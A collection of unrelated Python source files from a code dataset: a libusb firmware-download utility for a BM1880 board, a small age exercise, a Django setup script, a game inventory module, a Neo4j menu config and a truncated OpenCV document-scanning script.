usb.core.find(idVendor=self.get_vid(vid_pid),\n idProduct=self.get_pid(vid_pid), bus=t_bus, port_numbers=t_port_numbers)\n else:\n self.device = usb.core.find(idVendor=self.get_vid(vid_pid), idProduct=self.get_pid(vid_pid))\n if self.device is not None:\n # found = 1\n time.sleep(1)\n self.dev_backend = self.device.backend\n break\n if self.device is None:\n if timeout != 0 and ((time.time() - query_time) > timeout):\n sys.stdout.write(\"Query device timeout!\\n\" )\n sys.stdout.flush()\n sys.exit(-1)\n time.sleep(0.05)\n else:\n try:\n cfg = self.device.get_active_configuration()\n except (NotImplementedError, usb.USBError):\n if timeout != 0 and ((time.time() - query_time) > timeout):\n sys.stdout.write(\"Query device timeout!\\n\" )\n sys.stdout.flush()\n sys.exit(-1)\n else:\n sys.stdout.write(\"Waiting for LibUSB hooked: %s \\r\" % (progress_symbol[i%len(progress_symbol)]))\n sys.stdout.flush()\n time.sleep(0.05)\n continue\n except usb.USBError as e:\n continue\n found = 1\n # detach the linux kernel driver.\n osName = platform.system()\n if osName == 'Linux':\n if self.device.is_kernel_driver_active(1) is True:\n self.device.detach_kernel_driver(1)\n elif osName == 'Windows':\n sys.stdout.write(\"LIBUSB on %s \\n\" %(osName))\n sys.stdout.flush()\n else:\n sys.stdout.write(\"Cannot support OS %s\\n\" %(osName))\n sys.stdout.flush()\n sys.exit(-1)\n \n intf = cfg[(0,0)]\n self.epOut = usb.util.find_descriptor(\n intf,\n # match the first OUT endpoint\n custom_match = \\\n lambda e: \\\n usb.util.endpoint_direction(e.bEndpointAddress) == \\\n usb.util.ENDPOINT_OUT)\n self.epIn = usb.util.find_descriptor(\n intf,\n # match the first OUT endpoint\n custom_match = \\\n lambda e: \\\n usb.util.endpoint_direction(e.bEndpointAddress) == \\\n usb.util.ENDPOINT_IN)\n return self.device\n\n def libusb_write(self, command, recv_ack, delay_ms):\n start_time = time.time()\n write_len = -1;\n try:\n write_len = self.epOut.write(command, 5000)\n except usb.USBError as e:\n print (\"Write error\" + e)\n \n return write_len\n\n def usb_send_file(self, filename, dest_addr, delay_ms):\n self.ioTime = 0\n start_time = time.time()\n complete_cnt = 0\n while (complete_cnt < 1): # For stress test\n complete_cnt = complete_cnt + 1\n last_pos = 0\n tx_len = 1048576\n content_file = open(filename, 'rb')\n content_size = os.path.getsize(filename)\n 
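# ---------------------------------------------------------------------------
# Illustrative sketch: crc16_ccitt above is the table-driven form of
# CRC-16/XMODEM (polynomial 0x1021, initial value 0x0000, MSB first). The
# bitwise form below is slower but makes the polynomial explicit and needs
# no 256-entry table.
def crc16_xmodem(data):
    crc = 0x0000
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            crc = ((crc << 1) ^ 0x1021) & 0xFFFF if crc & 0x8000 else (crc << 1) & 0xFFFF
    return crc

assert crc16_xmodem(b"123456789") == 0x31C3  # standard CRC-16/XMODEM check value
# ---------------------------------------------------------------------------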
print (\"%s is %d bytes\" % (filename, content_size))\n print (\"Send to address 0x%x\" % dest_addr)\n\n while (content_size > 0):\n del self.data[:]\n content_file.seek(last_pos)\n if (content_size < tx_len):\n self.data.fromfile(content_file, content_size)\n tx_len = content_size\n else:\n self.data.fromfile(content_file, tx_len)\n last_pos = content_file.tell()\n\n send_len = self.libusb_write(self.data, 1, delay_ms)\n\n if send_len >= 0:\n dest_addr += send_len\n content_size -= send_len\n last_pos = last_pos - tx_len + send_len\n else:\n print (\"IO error, stop send file\")\n break\n # print (\"complete_cnt %d\" % complete_cnt)\n print (\"--- %s Seconds ---\" % round(time.time() - start_time, 2 ))\n # print (\"--- %s Seconds ---\" % str(self.ioTime))\n return\n\n def _usb_send_req(self, command, recv_ack, delay_ms):\n start_time = time.time()\n try:\n self.epOut.write(command, timeout=0)\n except usb.USBError as e:\n print (\"Write data timeout: %s\\n\", e)\n \n self.ioTime = self.ioTime + (time.time() - start_time)\n\n if recv_ack == 1:\n cmd_crc = self.crc16_ccitt(command)\n # print (\"cmd_crc %x\" % cmd_crc)\n\n start_time = time.time()\n try:\n rsp = self.epIn.read(16, timeout=0);\n except usb.USBError as e:\n print (\"Read ACK timeout\")\n self.ioTime = self.ioTime + (time.time() - start_time)\n ret_crc = (rsp[2])*256 + (rsp[3])\n #print (\"ret_crc %x\" % ret_crc)\n\n if ret_crc == cmd_crc:\n return rsp\n else:\n print (\"ACK_CRC_ERROR\")\n return\n else:\n return\n\n def usb_send_req_data(self, token, address, reqLen, ack, data=None):\n del self.ser_cmd[:]\n self.ser_cmd.append(token) # command\n self.ser_cmd.append(0) # high byte of packet size\n self.ser_cmd.append(reqLen) # low byte of packet size\n self.ser_cmd.append((address >> 32) & 0xFF) # 5 bytes for destination address\n self.ser_cmd.append((address >> 24) & 0xFF)\n self.ser_cmd.append((address >> 16) & 0xFF)\n self.ser_cmd.append((address >> 8) & 0xFF)\n self.ser_cmd.append((address & 0xFF))\n if data is not None:\n self.ser_cmd = self.ser_cmd + data\n if ack != 0:\n return self._usb_send_req(self.ser_cmd, 1, 0)\n else:\n return self.libusb_write(self.ser_cmd, 0, 0)\n\n def usb_send_req_kernel(self, token, reqLen, file_name, ack):\n del self.ser_cmd[:]\n self.ser_cmd.append(token) # command\n #ser_cmd.append(0) # high byte of packet size\n self.ser_cmd.append((reqLen >> 32) & 0xFF) # 5 bytes for destination address\n self.ser_cmd.append((reqLen >> 24) & 0xFF)\n self.ser_cmd.append((reqLen >> 16) & 0xFF)\n self.ser_cmd.append((reqLen >> 8) & 0xFF)\n self.ser_cmd.append((reqLen & 0xFF))\n #file_name_List = list(file_name)\n self.ser_cmd.fromstring(file_name)\n if ack != 0:\n return self._usb_send_req(self.ser_cmd, 1, 0)\n else:\n return self.libusb_write(self.ser_cmd, 0, 0)\n\n def protocol_msg_send(self, message, length, response):\n start_time = time.time()\n try:\n self.epOut.write(message, timeout=0)\n except usb.USBError as e:\n print (\"Write data fail!\")\n return pkt.FAIL\n self.ioTime = self.ioTime + (time.time() - start_time) \n\n if response == 1:\n start_time = time.time()\n try:\n ret = self.epIn.read(16);\n except usb.USBError as e:\n print (\"message response fail\")\n self.ioTime = self.ioTime + (time.time() - start_time)\n\n cmd_crc = self.crc16_ccitt(message)\n # print (\"cmd_crc %x\" % cmd_crc) \n \n ret_crc = (ret[pkt.RSP_CRC16_HI_OFFSET])*256 + (ret[pkt.RSP_CRC16_LO_OFFSET])\n #print (\"ret_crc %x\" % ret_crc)\n\n if ret_crc == cmd_crc:\n if message[pkt.MSG_TOKEN_OFFSET] != 
ret[pkt.RSP_TOKEN_OFFSET]:\n sys.stdout.write(\"Token: exp 0x%x get 0x%x\\n\" % (message[pkt.MSG_TOKEN_OFFSET], ret[pkt.RSP_TOKEN_OFFSET]))\n sys.stdout.flush()\n return pkt.SUCCESS\n else:\n sys.stdout.write(\"ACK_CRC_ERROR\")\n sys.stdout.flush()\n return pkt.FAIL\n else:\n return pkt.SUCCESS\n\n def protocol_msg_fill_header(self, message, token, addr, reqLen, dataSize):\n message.append(token) # command\n message.append((reqLen >> 8) & 0xFF) # high byte of packet size\n message.append(reqLen & 0xFF) # low byte of packet size\n message.append((addr >> 32) & 0xFF) # 5 bytes for destination address\n message.append((addr >> 24) & 0xFF)\n message.append((addr >> 16) & 0xFF)\n message.append((addr >> 8) & 0xFF)\n message.append((addr & 0xFF))\n if dataSize != 0:\n message.append((dataSize & 0xFF))\n message.append((dataSize >> 8 & 0xFF))\n message.append((dataSize >> 16 & 0xFF))\n message.append((dataSize >> 24 & 0xFF))\n message.append((dataSize >> 32 & 0xFF))\n message.append((dataSize >> 40 & 0xFF))\n message.append((dataSize >> 48 & 0xFF))\n message.append((dataSize >> 56 & 0xFF))\n return\n\n def protocol_usb_write(self, dataBuf):\n try:\n self.epOut.write(dataBuf, timeout=0)\n except usb.USBError as e:\n print (\"Write data Fail %s\" %e)\n return pkt.FAIL\n return pkt.SUCCESS\n\n def protocol_msg_s2d_once(self, addr, dataBuf, length):\n msg = []\n self.protocol_msg_fill_header(msg, BM_USB_S2D, addr, USB_MSG_S2D_SIZE, length)\n if self.protocol_msg_send(msg, USB_MSG_S2D_SIZE, 1) == FAIL:\n return pkt.FAIL\n else:\n return self.protocol_usb_write(dataBuf)\n\n def protocol_send_file(self, filename, dest_addr):\n complete_cnt = 0\n while (complete_cnt < 1): # For stress test\n tmp_addr = dest_addr\n self.ioTime = 0\n start_time = time.time()\n\n complete_cnt = complete_cnt + 1\n last_pos = 0\n tx_len = USB_BULK_MAX_SIZE\n content_file = open(filename, 'rb')\n content_size = os.path.getsize(filename)\n file_size = content_size\n print (\"%s is %d bytes\" % (filename, content_size))\n print (\"Send to address 0x%x\" % tmp_addr)\n\n while (content_size > 0):\n del self.data[:]\n\n content_file.seek(last_pos)\n if (content_size < tx_len):\n self.data.fromfile(content_file, content_size)\n tx_len = content_size\n else:\n self.data.fromfile(content_file, tx_len)\n last_pos = content_file.tell()\n \n send_ok = self.protocol_msg_s2d_once(tmp_addr, self.data, tx_len)\n\n if send_ok == 0:\n tmp_addr += tx_len\n content_size -= tx_len\n sys.stdout.write(\"[Working] %d%% \\r\" % (((file_size - content_size) * 100) / file_size))\n sys.stdout.flush() \n else:\n last_pos -= tx_len\n\n # print (\"complete_cnt %d\" % complete_cnt)\n print (\"--- %s Seconds ---\" % round(time.time() - start_time, 2 ))\n print (\"--- %s Seconds ---\" % str(self.ioTime))\n return\n\n def wait_for_reconnect(self, cnt_seconed):\n progress_symbol = ['---', ' \\\\', ' \\\\', ' |', ' |', ' |', ' |', ' /', ' /']\n while cnt_seconed > 0:\n cnt_seconed = cnt_seconed - 1\n sys.stdout.write(\"Waiting for re-connect: %s \\r\" % (progress_symbol[cnt_seconed%len(progress_symbol)]))\n sys.stdout.flush()\n time.sleep(1)\n\n def vidpid_string(self, vid_str, pid_str):\n vid_str = vid_str.replace(\"0x\", \"\")\n pid_str = pid_str.replace(\"0x\", \"\")\n while len(vid_str) < 4:\n vid_str = '0' + vid_str\n while len(pid_str) < 4:\n pid_str = '0' + pid_str\n verify_vidpid = verify_vidpid + vid_str + ':' + pid_str\n\n def usb_emmc_dl_verify(self, vid_pid_list, timeout):\n print(\"verify id = %s\" % vid_pid_list)\n if self.emmc_timeout == 0:\n 
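# ---------------------------------------------------------------------------
# Illustrative sketch (assumes Python 3): protocol_msg_fill_header above
# builds its header byte by byte. The same layout via struct/int.to_bytes
# shows the mixed endianness those appends produce -- big-endian 16-bit
# length and 40-bit address, but a little-endian 64-bit data size.
import struct

def fill_header(token, addr, req_len, data_size=0):
    hdr = struct.pack(">BH", token, req_len) + addr.to_bytes(5, "big")
    if data_size != 0:
        hdr += struct.pack("<Q", data_size)
    return hdr
# ---------------------------------------------------------------------------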
query_timeout = timeout\n else:\n query_timeout = self.emmc_timeout\n # print(\"emmc_timeout = %s s\" % self.emmc_timeout)\n # print(\"query_timeout = %s s\" % query_timeout)\n self.libusb_query(vid_pid_list, query_timeout)\n\n def show_usage(self):\n sys.stdout.write(\"usage- python [script] vvid=[vid] vpid=[pid]\\n\") \n sys.stdout.write(\" [script] : %s \\n\" %__file__)\n sys.stdout.write(\" [vvid] : reconnect vid if emmc dl complete check enable \\n\")\n sys.stdout.write(\" [vpid] : reconnect pid if emmc dl complete check enable \\n\")\n sys.stdout.write(\" [timeout]: verify timeout (second) from emmc programming to kerel start \\n\") \n sys.stdout.write(\" 0 means wait forever (default) \\n\")\n sys.stdout.flush() \n\n def parse_arg(self):\n vid = ''\n pid = ''\n for i in range(1, len(sys.argv)):\n if 'vvid' in sys.argv[i]:\n vid = sys.argv[i]\n vid = vid.replace('vvid=', '')\n if 'vpid' in sys.argv[i]:\n pid = sys.argv[i]\n pid = pid.replace('vpid=', '') \n if 'timeout' in sys.argv[i]:\n s = sys.argv[i]\n s = s.replace('timeout=', \"\")\n self.emmc_timeout = int(s)\n print(\"emmc timeout = %d s\" % self.emmc_timeout)\n if 'location' in sys.argv[i]:\n self.location = sys.argv[i]\n self.location = self.location.replace('location=', '')\n print(\"bus location = \" + self.location)\n if 'stdout' in sys.argv[i]:\n self.stdout = sys.argv[i]\n self.stdout = self.stdout.replace('stdout=', '')\n print(\"stdout = \" + self.stdout)\n sys.stdout=open(self.stdout, \"a\")\n if 'usage' in sys.argv[i]:\n show_usage()\n sys.exit(0)\n if len(vid) != 0 and len(pid) != 0:\n vidpid_string(vid, pid)\n else:\n if len(vid) != 0:\n sys.stdout.write(\"pid is not appointed! \\n\")\n sys.stdout.flush()\n show_usage()\n sys.exit(-1)\n if len(pid) != 0:\n sys.stdout.write(\"vid is not appointed! 
\\n\")\n sys.stdout.flush()\n show_usage()\n sys.exit(-1)\n\n def __init__(self):\n self.device = 0\n self.dev_backend = 0\n self.epOut = 0\n self.epIn = 0\n self.data = array('B')\n self.ser_cmd = array('B')\n self.ioTime = 0\n self.emmc_timeout = 0\n self.python_version = 3\n self.location = None\n self.stdout = None\n if sys.version_info[0] < 3:\n self.python_version = 2;\n","sub_path":"install/soc_bm1880_asic_edb/bm1880_emmc_dl_v1p1/bm_usb_util/bm_usb_libusb.py","file_name":"bm_usb_libusb.py","file_ext":"py","file_size_in_byte":20762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"229333398","text":"from datetime import date\nanoN = int(input('Digite seu ano de nascimento: '))\nidade = date.today().year - anoN\nprint('Quem nasceu em {} tem {} anos em {}'.format(anoN, idade, date.today().year))\nif idade == 18:\n print('ALISTE-SE AGORA')\nelif idade < 18:\n print('Faltam {} anos para o seu alistamento obrigatorio!'.format(18 - idade))\nelif idade > 18:\n print('Seu alistamento foi em {}'.format(date.today().year-(idade-18)))\n\n","sub_path":"CursoemVideo/desafio39.py","file_name":"desafio39.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"76960196","text":"import os\nos.environ['DJANGO_SETTINGS_MODULE'] = 'settings'\nfrom django.db.models.loading import cache as model_cache\nif not model_cache.loaded:\n model_cache.get_models()\nfrom django.http import HttpResponse\nfrom django.template.loader import get_template\nfrom django.template import Context, Template\nfrom django.shortcuts import render,RequestContext\nfrom django.http import HttpResponse\nfrom pages.models import Page,Categorie_Page,Template\nfrom moteur.models import Film\nfrom scripts_django.tools import recursif_template\nimport settings\n\n\nb = Page(Nom=\"ImageActeur_Modele\")\nb.save()\nb = Page(Nom=\"Acteur_Modele\")\nb.save()\nb = Page(Nom=\"ImageFilm_Modele\")\nb.save()\nb = Page(Nom=\"Film_Modele\")\nb.save()\nb = Page(Nom=\"ImageVente_Modele\")\nb.save()\nb = Page(Nom=\"Pack_Modele\")\nb.save()\nb = Page(Nom=\"ImageVideo_Modele\")\nb.save()\nb = Page(Nom=\"Pack_Modele\")\nb.save()\nb = Template(Nom=\"index\",contenu=\"\"\"\n\n
\n
\n{% include titi %}\n\n\"\"\")\nb.save()\nb = Template(Nom=\"titi\",contenu=\"\"\"titi\n{% include toto %}\"\"\")\nb.save()\nb = Template(Nom=\"toto\",contenu=\"\"\"toto\"\"\")\nb.save()\nb = Page(Nom=\"index\",Template=Template.objects.get(\"index\"))\nb.save()\n","sub_path":"old/danakold2/Initialisation.py","file_name":"Initialisation.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"357962155","text":"# -*- coding: utf-8 -*-\nimport traceback\n\nfrom BagConfig import BagConfig\nfrom itemsConfig import itemsIndex\nfrom KBEDebug import *\n__author__ = 'chongxin'\n__createTime__ = '2016年12月26日'\n\"\"\"\n背包模块\n\"\"\"\nclass BagModule:\n\n\n def onEntitiesEnabled(self):\n # 加载宝石\n self.loadDiamonds()\n # 加载装备\n self.loadEquips()\n # 加载礼包\n self.loadGifts()\n # 加载材料\n self.loadMaterial()\n # 加载碎片\n self.loadPiecesItem()\n # 加载消耗品\n self.loadUse()\n pass\n\n # --------------------------------------------------------------------------------------------\n # 客户端调用函数\n # --------------------------------------------------------------------------------------------\n # 客户端请求背包列表\n def onClientGetItemList(self):\n retItems = []\n for uuid in self.bagUUIDList:\n _,item = self.getItemByUUID(uuid)\n if item is None:\n continue\n value = {}\n value[\"UUID\"] = uuid\n value[\"itemID\"] = item[\"itemID\"]\n value[\"amount\"] = item[\"amount\"]\n retItems.append(value)\n\n ERROR_MSG(\"onClientGetItemList\")\n self.client.onGetItemList(retItems)\n\n\n # 批量出售\n def onClientSellBatch(self,uuidList):\n for uuid in uuidList:\n # 获得装备\n ERROR_MSG(\"-------------------uuid is ---------\" +str(uuid))\n _,item = self.getItemByUUID(uuid)\n if item != None:\n # 获得数量\n ERROR_MSG(\"------------UUID ----------------\" + str(uuid) + \" price \" + str( itemsIndex[item[\"itemID\"]][\"price\"]))\n amount = item[\"amount\"]\n self.onClientSellOne(uuid,amount)\n\n\n # 出售一个\n def onClientSellOne(self,uuid,num):\n\n itemType,item = self.getItemByUUID(uuid)\n\n if item is None:\n return\n ammount = item[\"amount\"]\n\n if num > ammount:\n return\n\n # 获得装备ID\n itemId = item[\"itemID\"]\n # 获得单价\n price = itemsIndex[itemId][\"price\"]\n\n sellMoney = self.euro + num * price\n\n result = False\n if itemType == ItemTypeEnum.Diamond:\n self.decDiamond(uuid,num)\n elif itemType == ItemTypeEnum.Equips:\n self.decEquip(uuid,num)\n elif itemType == ItemTypeEnum.Gift:\n self.decGift(uuid,num)\n elif itemType == ItemTypeEnum.Use:\n self.decUse(uuid,num)\n elif itemType == ItemTypeEnum.Pieces:\n self.decPieces(uuid,num)\n elif itemType == ItemTypeEnum.Material:\n self.decMaterial(uuid,num)\n\n # if result is True:\n self.euro = sellMoney\n ERROR_MSG(\"------------itemID ----------------\" + str(itemId) + \" price \"+ str(price))\n\n # 扩容\n def onClientBuyBagSize(self,count):\n needDiamond = count * BagConfig[1][\"bagPrice\"]\n\n if self.diamond >= needDiamond:\n self.diamond = self.diamond - needDiamond\n self.bagSize = self.bagSize + count\n\n\n\n\n\n\n # --------------------------------------------------------------------------------------------\n # 工具函数调用函数\n # --------------------------------------------------------------------------------------------\n\n def getItemByUUID(self,uuid):\n itemType = ItemTypeEnum.Wrong\n item = None\n\n if uuid not in self.bagUUIDList:\n return itemType,item\n\n if uuid in self.equipsContainer:\n item = self.equipsContainer[uuid]\n itemType = ItemTypeEnum.Equips\n elif uuid in self.useContainer:\n item = 
self.useContainer[uuid]\n itemType = ItemTypeEnum.Use\n elif uuid in self.materialContainer:\n item = self.materialContainer[uuid]\n itemType = ItemTypeEnum.Material\n elif uuid in self.diamondsContainer:\n item = self.diamondsContainer[uuid]\n itemType = ItemTypeEnum.Diamond\n elif uuid in self.piecesContainer:\n item = self.piecesContainer[uuid]\n itemType = ItemTypeEnum.Pieces\n elif uuid in self.giftContainer:\n item = self.giftContainer[uuid]\n itemType = ItemTypeEnum.Gift\n\n return itemType,item\n\n # 加一个道具到背包,并分发到各个容器\n def putItemInBag(self,itemID,num):\n itemID = int(itemID)\n if itemID not in itemsIndex:\n return\n\n\n itemIndex = itemsIndex[itemID]\n itemType = itemIndex[\"itemsType\"]\n\n # 检查背包大小\n isTogether = itemIndex[\"isTogether\"]\n\n needBagSize = 1\n if isTogether <= 0:\n needBagSize = num\n\n if len(self.bagUUIDList)+ needBagSize > self.bagSize:\n ERROR_MSG(\"putItemInBag itemId \"+str(itemID)+\" len \" + str(len(self.bagUUIDList)) + \" needBagSize \" + str(needBagSize) + \" bagSize \" + str(self.bagSize))\n return\n\n if itemType == ItemTypeEnum.Equips:\n self.addEquipByItemID(itemID,num)\n elif itemType == ItemTypeEnum.Use:\n self.addUse(itemID,num)\n elif itemType == ItemTypeEnum.Material:\n self.addMaterial(itemID,num)\n elif itemType == ItemTypeEnum.Diamond:\n self.addDiamond(itemID,num)\n elif itemType == ItemTypeEnum.Pieces:\n self.addPieces(itemID,num)\n elif itemType == ItemTypeEnum.Gift:\n self.addGift(itemID,num)\n\n # 根据itemID获得数量\n def getItemNumByItemID(self,itemID):\n count = 0\n for uuid in self.bagUUIDList:\n _, item = self.getItemByUUID(uuid)\n if item is None:\n continue\n if item[\"itemID\"] == int(itemID):\n count = count + item[\"amount\"]\n\n return count\n\n # 删除物品\n def decItem(self,itemID,num):\n itemID = int(itemID)\n itemIndex = itemsIndex[itemID]\n itemType = itemIndex[\"itemsType\"]\n ERROR_MSG(\" decItem itemID \" + str(itemID) +\" itemType \" + str(itemType) + \" num \" + str(num))\n\n decCount = num\n\n for uuid in self.bagUUIDList:\n _, item = self.getItemByUUID(uuid)\n if item is None:\n continue\n\n if decCount <= 0:\n break\n if item[\"itemID\"] == itemID:\n result = False\n amount = item[\"amount\"]\n if amount < decCount:\n num = amount\n\n\n ERROR_MSG(\" itemID is \"+ str(itemID) +\" amount \"+ str(item[\"amount\"]))\n if itemType == ItemTypeEnum.Diamond:\n result = self.decDiamond(uuid, num)\n elif itemType == ItemTypeEnum.Equips:\n result = self.decEquip(uuid, num)\n elif itemType == ItemTypeEnum.Gift:\n result = self.decGift(uuid, num)\n elif itemType == ItemTypeEnum.Use:\n result = self.decUse(uuid, num)\n elif itemType == ItemTypeEnum.Pieces:\n result = self.decPieces(uuid, num)\n elif itemType == ItemTypeEnum.Material:\n result = self.decMaterial(uuid, num)\n\n decCount = decCount - amount\n\n # if result is True:\n # ERROR_MSG(\"bagModule result is True\")\n # value = {}\n # value[\"UUID\"] = uuid\n # value[\"itemID\"] = itemID\n # value[\"amount\"] = item[\"amount\"] - num\n # self.client.onGetItemInfo(value)\n # else:\n # ERROR_MSG(\"bagModule result is False\")\n # return result\n return False\n\n def noticeClientBagUpdate(self,uuid,itemId,num):\n if uuid not in self.bagUUIDList:\n if num != 0:\n self.bagUUIDList.append(uuid)\n else:\n ERROR_MSG(\"--------exec Error check now!!! 
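# ---------------------------------------------------------------------------
# Illustrative sketch: getItemByUUID above dispatches through six almost
# identical elif branches. A table-driven variant (hypothetical helper, not
# used by the class) keeps the container-to-type mapping in one place and
# preserves the original fallback of (Wrong, None).
def get_item_by_uuid(self, uuid):
    if uuid not in self.bagUUIDList:
        return ItemTypeEnum.Wrong, None
    containers = (
        (self.equipsContainer,   ItemTypeEnum.Equips),
        (self.useContainer,      ItemTypeEnum.Use),
        (self.materialContainer, ItemTypeEnum.Material),
        (self.diamondsContainer, ItemTypeEnum.Diamond),
        (self.piecesContainer,   ItemTypeEnum.Pieces),
        (self.giftContainer,     ItemTypeEnum.Gift),
    )
    for container, item_type in containers:
        if uuid in container:
            return item_type, container[uuid]
    return ItemTypeEnum.Wrong, None
# ---------------------------------------------------------------------------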
-----------\")\n traceback.print_stack()\n value = {}\n value[\"UUID\"] = uuid\n value[\"itemID\"] = int(itemId)\n value[\"amount\"] = num\n self.client.onGetItemInfo(value)\n\n if num <= 0:\n self.bagUUIDList.remove(uuid)\n\nclass ItemOrderBy:\n byItemType = 1\n byQualityOrder = 2\n\nclass ItemTypeEnum:\n\n # 错误类型\n Wrong = 1000\n\n Equips = 1001\n # 消耗品\n Use = 1002\n # 宝石\n Diamond = 1003\n # 礼包\n Gift = 1004\n # 材料\n Material = 1005\n # 球员碎片\n Pieces = 1006\n\n\n\n\n\n\n\n\n\n # 装备\n\nif __name__ == \"__main__\":\n print(__file__)\n pass\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"scripts/base/part/BagModule.py","file_name":"BagModule.py","file_ext":"py","file_size_in_byte":8837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"27966518","text":"from controller.Neo4jController import Neo4jController\nfrom controller.Controller import Controller, Tags\nfrom servers.neo4j_server.Neo4jServer import Neo4jServer\n\nmenu_list = {\n 'Neo4j menu': {\n 'Messages with tags': Neo4jController.get_users_with_tagged_messages,\n 'N-long mutuals': Neo4jController.get_users_with_n_long_relations,\n 'Shortest way between users': Neo4jController.shortest_way_between_users,\n 'Spam conversations': Neo4jController.get_users_wicth_have_only_spam_conversation,\n 'Unrelated users with tags': Neo4jController.get_unrelated_users_with_tagged_messages,\n 'Exit': Controller.stop_loop,\n }\n}\n\nroles = {\n 'utilizer': 'Utilizer menu',\n 'admin': 'Admin menu'\n}\n\nneo4j = Neo4jServer()\nspecial_parameters = {\n 'role': '(admin or utilizer)',\n 'tags': '('+', '.join(x.name for x in list(Tags))+')(Enter comma-separated values)',\n 'username1': '(' + ', '.join(x for x in neo4j.get_users()) + ')',\n 'username2': '(' + ', '.join(x for x in neo4j.get_users()) + ')'\n}\n","sub_path":"lab3/src/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"483012908","text":"from skimage.filters import threshold_local\nimport numpy as np\nimport argparse\nimport cv2\nimport imutils\nimport urllib\nfrom PIL import Image\nfrom PIL import ImageEnhance\nimport boto3\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\",\"--image\", required = True)\nargs = vars(ap.parse_args())\n#image = cv2.imread(args[\"image\"])\nurl_response = urllib.request.urlopen(args[\"image\"])\nimg_array = np.array(bytearray(url_response.read()), dtype=np.uint8)\nimage = cv2.imdecode(img_array, -1)\n\ndef order_points(pts):\n rect = np.zeros((4, 2), dtype = \"float32\")\n s = pts.sum(axis = 1)\n rect[0] = pts[np.argmin(s)]\n rect[2] = pts[np.argmax(s)]\n diff = np.diff(pts, axis = 1)\n rect[1] = pts[np.argmin(diff)]\n rect[3] = pts[np.argmax(diff)]\n return rect\n\ndef clahe(img, clip_limit=2.0, grid_size=(8,8)):\n clahe = cv2.createCLAHE(clipLimit=clip_limit, tileGridSize=grid_size)\n return clahe.apply(img)\n\ndef mask(image):\n src = image\n orig = src.copy()\n hsv = cv2.cvtColor(src.copy(), cv2.COLOR_BGR2HSV)\n lower_blue = np.array([0, 0, 120])\n upper_blue = np.array([180, 38, 255])\n mask = cv2.inRange(hsv, lower_blue, upper_blue)\n result = cv2.bitwise_and(src, src, mask=mask)\n b, g, r = cv2.split(result)\n g = clahe(g, 5, (3, 3))\n\n\n img_blur = cv2.blur(g, (9, 9))\n img_th = cv2.adaptiveThreshold(img_blur, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY, 51, 2)\n\n contours, hierarchy = cv2.findContours(img_th,cv2.RETR_CCOMP,cv2.CHAIN_APPROX_SIMPLE)\n 
max_brightness = 0\n canvas = src.copy()\n for cnt in contours:\n rect = cv2.boundingRect(cnt)\n x, y, w, h = rect\n if w*h > 40000:\n mask = np.zeros(src.shape, np.uint8)\n mask[y:y+h, x:x+w] = src[y:y+h, x:x+w]\n brightness = np.sum(mask)\n if brightness > max_brightness:\n brightest_rectangle = rect\n max_brightness = brightness\n print(rect)\n break\n\n x, y, w, h = brightest_rectangle\n cv2.rectangle(canvas, (x, y), (x+w, y+h), (0, 255, 0), 1)\n cv2.imwrite('maskedimg.jpg',mask)\n gray = cv2.cvtColor(mask,cv2.COLOR_BGR2GRAY)\n _,thresh = cv2.threshold(gray,1,255,cv2.THRESH_BINARY)\n contours,hierarchy = cv2.findContours(thresh,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n cnt = contours[0]\n x,y,w,h = cv2.boundingRect(cnt)\n crop = image[y:y+h,x:x+w]\n print(cnt)\n cv2.imwrite('croppedimg.jpg',crop)\n cropped=Image.open('croppedimg.jpg')\n enhance_img(cropped);\n\n\ndef enhance_img(image1):\n print('Step 5. Enhance')\n enh_bri = ImageEnhance.Brightness(image1)\n brightness = 1.2\n image_brightened = enh_bri.enhance(brightness)\n\n image1 = image_brightened\n enh_col = ImageEnhance.Color(image1)\n color = 1.6\n image_colored = enh_col.enhance(color)\n\n image1 = image_colored\n enh_con = ImageEnhance.Contrast(image1)\n contrast = 2\n image_contrasted = enh_con.enhance(contrast)\n\n image1 = image_contrasted\n enh_sha = ImageEnhance.Sharpness(image1)\n sharpness = 1.3\n image_sharped = enh_sha.enhance(sharpness)\n image_sharped.save(\"output/demo_output.jpg\")\n\n #client = boto3.client('s3', region_name='ap-south-1')\n #client.upload_file('/var/www/html/python/' + 'demo_output.jpg', 'dockboyz', 'uploads/after/{}'.format('demo_output.jpg'))\n\ndef four_point_transform(image, pts):\n rect = order_points(pts)\n (tl, tr, br, bl) = rect\n widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n maxWidth = max(int(widthA), int(widthB))\n\n heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n maxHeight = max(int(heightA), int(heightB))\n\n dst = np.array([\n [0, 0],\n [maxWidth - 1, 0],\n [maxWidth - 1, maxHeight - 1],\n [0, maxHeight - 1]], dtype = \"float32\")\n \n\n M = cv2.getPerspectiveTransform(rect, dst)\n warped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))\n \n\n return warped, maxHeight*maxWidth\n\ndef blurrchecker(image):\n return cv2.Laplacian(image,cv2.CV_64F).var()\n\n#image = cv2.imread('paper23.png')\n\nprint(\"Step 1. Check blur score\")\nif (blurrchecker(image) < 80.0):\n print(\"Please re-take the image\")\n print(blurrchecker(image))\nelse:\n print(blurrchecker(image))\n ratio = image.shape[0]/500.0\n orig = image.copy()\n image= imutils.resize(image,height = 500)\n gray = cv2.cvtColor(image,cv2.COLOR_BGR2RGB)\n retval,threshold = 